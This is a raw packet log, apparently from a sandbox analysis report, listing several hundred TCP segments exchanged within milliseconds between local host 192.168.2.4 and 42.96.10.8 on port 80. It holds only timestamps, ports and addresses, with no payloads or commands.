                                                                                                                                                                                                            Nov 13, 2024 13:25:22.482999086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483000994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483014107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483026981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483031988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483048916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483063936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483064890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483088970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483458042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483474970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483490944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483505011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483508110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483522892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483525991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483541012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483556032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483571053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483586073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483587027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483603001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483614922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483623981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483632088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483649015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483664989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483680010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483680964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483696938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483699083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483715057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483728886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483757019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483772993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483788967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483798981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483804941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483820915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483829975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483836889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483851910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483851910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483869076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483884096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483884096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483903885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483915091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483918905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483935118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483949900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483952045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483968019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483983040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.483984947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484000921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484015942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484015942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484035015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484050035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484051943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484066963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484097958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484366894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484384060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484399080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484411955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484417915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484437943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484441042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484457970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484472990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484477997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484488964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484503031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484503984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484533072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484538078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484546900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484561920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484580040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484595060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484596968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484612942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484623909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484632015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484642982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484648943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484664917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484680891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484694004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484697104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484711885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484714985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484730959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484746933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484750032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484762907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484776974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484778881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484808922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484814882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484833002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484848022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484864950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484879017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484880924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484898090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484898090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484914064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484930038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484946966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484946966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484966040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484972000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.484983921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485008955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485295057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485311985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485327005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485342026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485349894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485359907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485373020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485387087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485402107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485418081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485419989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485435009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485445976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485452890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485469103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485485077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485487938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485501051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485512972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485518932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485534906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485537052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485564947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485783100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485800028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485815048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485830069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485845089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485847950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485877991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485884905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485901117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485915899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485930920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485943079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485958099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485960007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.485987902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486000061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486004114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486020088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486035109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486049891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486063957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486066103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486077070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486082077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486100912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486104012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486118078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486133099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486148119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486148119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486165047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486166954 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486181974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486197948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486197948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486215115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486229897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486243010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486246109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486264944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486265898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486279011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486294985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486310959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486311913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486327887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486335993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486345053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486361027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486375093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486377954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486411095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486726046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486742020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486757040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486771107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486774921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486790895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486804962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486807108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486824036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486838102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486840963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486871004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486871004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486887932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486903906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486907959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486938953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486943960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486957073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486973047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.486989021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487003088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487005949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487032890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487080097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487097025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487112045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487128019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487140894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487143993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487157106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487162113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487178087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487180948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487195015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487210035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487214088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487236977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487243891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487255096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487272024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487296104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487308025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487319946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487333059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487334967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487350941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487368107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487377882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487394094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487412930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487425089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487428904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487443924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487445116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487462044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487478018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487492085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487493038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487509012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487509012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487525940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487541914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487556934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487572908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487575054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487581015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487591982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487607956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487610102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487623930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487641096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487652063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487657070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487673998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487687111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487692118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487709045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487723112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487724066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487740040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487742901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487759113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487775087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487780094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487792969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487808943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487823963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487827063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487849951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487926006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487943888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487958908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487976074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487977028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.487996101 CET4973380192.168.2.442.96.10.8
